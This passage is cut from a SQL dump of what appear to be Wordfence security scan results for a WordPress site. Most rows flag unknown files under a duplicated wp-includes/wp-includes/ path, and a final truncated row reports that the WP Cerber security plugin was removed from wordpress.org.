tab)</span></a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78120,1675048873,1675048873,'new','knownfile',75,'a6342d31f853eb7e8893ef6b936fb16c','a9a379fdbfc07038304efb01221f3e35','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/comments.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/theme-compat/comments.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78121,1675048873,1675048873,'new','knownfile',75,'63046dd74d8c43d3592a59a7c1203e45','2c6213678cd62ad01ee894c2e250cab0','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/embed-404.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/theme-compat/embed-404.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78122,1675048873,1675048873,'new','knownfile',75,'ce1097740cce5271b02648cced338958','1b91d5ca9e61fe1b533e22ab2654f559','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/embed-content.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/theme-compat/embed-content.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78123,1675048873,1675048873,'new','knownfile',75,'f981ab61b51da50d579a8009a85d97c0','297728c81ee00300910b857ff4d59c87','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/embed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/theme-compat/embed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78124,1675048873,1675048873,'new','knownfile',75,'ae7bf5d86704bd7fb44d6e081a067136','755a8094818f58efc132f453bf7f32ba','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/footer-embed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/theme-compat/footer-embed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78125,1675048873,1675048873,'new','knownfile',75,'67ec43d031c24dd4b7891b1ba6326a88','9e854c0ecec98e3d1300e07784197b46','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/footer.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/theme-compat/footer.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78126,1675048873,1675048873,'new','knownfile',75,'6111f19e2ce59e81af9bf110e443dc8f','6d3b05dae5aef79e1ebf69ee0cc70851','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/header-embed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/theme-compat/header-embed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78127,1675048873,1675048873,'new','knownfile',75,'1b93f5bd5e023db4256fe6fed1862cf9','3a477fa8a4bdbc289d68989d9816a11a','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/header.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/theme-compat/header.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78128,1675048873,1675048873,'new','knownfile',75,'2aa0bf06dab2a8f5f22a90f15e3b17c3','fc7c04a474722ec20b47152901291d14','Unknown file in WordPress core: wp-includes/wp-includes/theme-compat/sidebar.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/theme-compat/sidebar.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78129,1675048873,1675048873,'new','knownfile',75,'c9b4301337909d4ab0d61844ef9c4328','4e487751a43ff9dc80d222e52a4d0ded','Unknown file in WordPress core: wp-includes/wp-includes/theme.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/theme.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78130,1675048873,1675048873,'new','knownfile',75,'110db214bded87665b2383dcdc6ff1e1','879b7d1a31b8cfacdcf8bd7a6bae9e31','Unknown file in WordPress core: wp-includes/wp-includes/update.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:34:\"wp-includes/wp-includes/update.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78131,1675048873,1675048873,'new','knownfile',75,'a522f938a6fd75c5e29dee38bb838817','f63541cd28472e75e3dfa8717e1b7129','Unknown file in WordPress core: wp-includes/wp-includes/user.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/user.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78132,1675048873,1675048873,'new','knownfile',75,'d1882d95b8069a2dee73034bca4a0cd0','8f3daac34569dcd0466733485d3f2468','Unknown file in WordPress core: wp-includes/wp-includes/vars.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:32:\"wp-includes/wp-includes/vars.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78133,1675048874,1675048874,'new','knownfile',75,'8d550b603afa12124b0330befa1e7575','17cad2d97eba7c113b522ae3e0384b8a','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-nav-menu-widget.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/widgets/class-wp-nav-menu-widget.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78134,1675048874,1675048874,'new','knownfile',75,'a22481feb45e24d40eae87ae0de9666d','0511a9d2090836a9f8a622a68147066c','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-archives.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/widgets/class-wp-widget-archives.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78135,1675048874,1675048874,'new','knownfile',75,'c206a250d15557b9603c3928b9827a8a','e1df35fa8da86a8ed9cd7d9c2fdc7eef','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-calendar.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/widgets/class-wp-widget-calendar.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78136,1675048875,1675048875,'new','knownfile',75,'d87515f54076648893a1fdcac8fca8f7','016874bc5b661677ad4e2383a80e7658','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-categories.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/widgets/class-wp-widget-categories.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78137,1675048875,1675048875,'new','knownfile',75,'b013c87ed7c73c6990b4d9de1326dd09','dddb3cdfd338069f4651f4b8fdda1fc7','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-custom-html.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/widgets/class-wp-widget-custom-html.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78138,1675048875,1675048875,'new','knownfile',75,'dd85f6b869d5256e0e01a950a1d8d948','667225d36e3bf3b856aee5cc8868e754','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-links.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/widgets/class-wp-widget-links.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78139,1675048875,1675048875,'new','knownfile',75,'7dad97a2a10f71866bf550490331a7fa','ae101fb21ffddcde2018d215f020434b','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-media-audio.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/widgets/class-wp-widget-media-audio.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78140,1675048875,1675048875,'new','knownfile',75,'7408d79a635a605c2d360cd65160799f','9ef2c0f21ad5bd8e6b566c544c73b991','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-media-gallery.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/widgets/class-wp-widget-media-gallery.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78141,1675048875,1675048875,'new','knownfile',75,'adb7ade70fe666ec7be1217fe09f3cbc','e6c353cb8d2e25865c8a7ec2f7b9fd18','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-media-image.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/widgets/class-wp-widget-media-image.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78142,1675048875,1675048875,'new','knownfile',75,'06bf8bfb175a7b00179da4d1dac868ca','3862b9c6e8c2c55ee2372e0b78df29ac','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-media-video.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/widgets/class-wp-widget-media-video.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78143,1675048875,1675048875,'new','knownfile',75,'1fd0243c9e6d1688cf3b32cdbf1a56ec','50dee6119394596f084b0cb0c0310bed','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-media.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/widgets/class-wp-widget-media.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78144,1675048875,1675048875,'new','knownfile',75,'39956d5c3d3e0896fe72d1aaab5601c4','e29163971878e253c8e59c01969ffe4f','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-meta.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/widgets/class-wp-widget-meta.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78145,1675048875,1675048875,'new','knownfile',75,'8feb155731dcf0f30f8eff9152261c61','2cbe2d8b7814b5d4aa91f56777956058','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-pages.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/widgets/class-wp-widget-pages.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78146,1675048875,1675048875,'new','knownfile',75,'ad5d6e4bb147af95dc4b3a89e7d45adf','25ac6c40b942aec55eccb0057bc3f9f4','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-recent-comments.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/widgets/class-wp-widget-recent-comments.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78147,1675048875,1675048875,'new','knownfile',75,'d086cb33e5f64489b639bf4ad942b09c','f089b15d214ee3d3ee35e58d36e5be2e','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-recent-posts.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/widgets/class-wp-widget-recent-posts.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78148,1675048875,1675048875,'new','knownfile',75,'8b2d83b960e88198255a173610595f71','9f89e8211eda231cd4ffe65065fba968','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-rss.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/widgets/class-wp-widget-rss.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78149,1675048875,1675048875,'new','knownfile',75,'a92cc4e58f3e4e21c8e3d051fb0a2e68','32a060de21778d3bcab0e6e20426fa89','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-search.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/widgets/class-wp-widget-search.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78150,1675048876,1675048876,'new','knownfile',75,'bfe07ace8f85604c9005cdc54f628814','5292733e61693d9f0314322208714c91','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-tag-cloud.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/widgets/class-wp-widget-tag-cloud.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78151,1675048876,1675048876,'new','knownfile',75,'3f45e340a65729fa92b8e96a9a508924','c67a8d84d88e10b2b073683e8107f3d4','Unknown file in WordPress core: wp-includes/wp-includes/widgets/class-wp-widget-text.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/widgets/class-wp-widget-text.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78152,1675048876,1675048876,'new','knownfile',75,'68bf09ad7165e6c676467e38e7188ae7','84acdf32c8dffa513f6e272db89c9e4c','Unknown file in WordPress core: wp-includes/wp-includes/widgets.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/widgets.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78153,1675048876,1675048876,'new','knownfile',75,'c487c2f869954dc8139b6f4462bdae3a','76dcecef8905bdc496d25fd0de95b142','Unknown file in WordPress core: wp-includes/wp-includes/wlwmanifest.xml','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/wlwmanifest.xml\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78154,1675048876,1675048876,'new','knownfile',75,'1b4c0842f6d04cd89cf5dda19f2b6d6a','f0f2d748f77fd58383fa816c8fba4030','Unknown file in WordPress core: wp-includes/wp-includes/wp-db.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:33:\"wp-includes/wp-includes/wp-db.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78155,1675048876,1675048876,'new','knownfile',75,'8306725d9fe84e10673c0f6dc8c39026','255ad7b6a04834a395aca0ec0e1d9120','Unknown file in WordPress core: wp-includes/wp-includes/wp-diff.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/wp-diff.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78165,1675048956,1675048956,'new','wfPluginRemoved',100,'118b4720998cf910948f7af661aafc46','118b4720998cf910948f7af661aafc46','The Plugin \"WP Cerber Security, Anti-spam &amp; Malware Scan\" has been removed from wordpress.org.','It has unpatched security issues and may have compatibility problems with the current version of WordPress. <a href=\"https://www.wordfence.com/help/?query=scan-result-plugin-removed\" target=\"_blank\" rel=\"noopener noreferrer\">Get more information.<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:17:{s:4:\"Name\";s:48:\"WP Cerber Security, Anti-spam &amp; Malware Scan\";s:9:\"PluginURI\";s:20:\"https://wpcerber.com\";s:7:\"Version\";s:5:\"8.9.6\";s:11:\"Description\";s:408:\"Defends WordPress against hacker attacks, spam, trojans, and viruses. Malware scanner and integrity checker. Hardening WordPress with a set of comprehensive security algorithms. Spam protection with a sophisticated bot detection engine and reCAPTCHA. Tracks user and intruder activity with powerful email, mobile and desktop 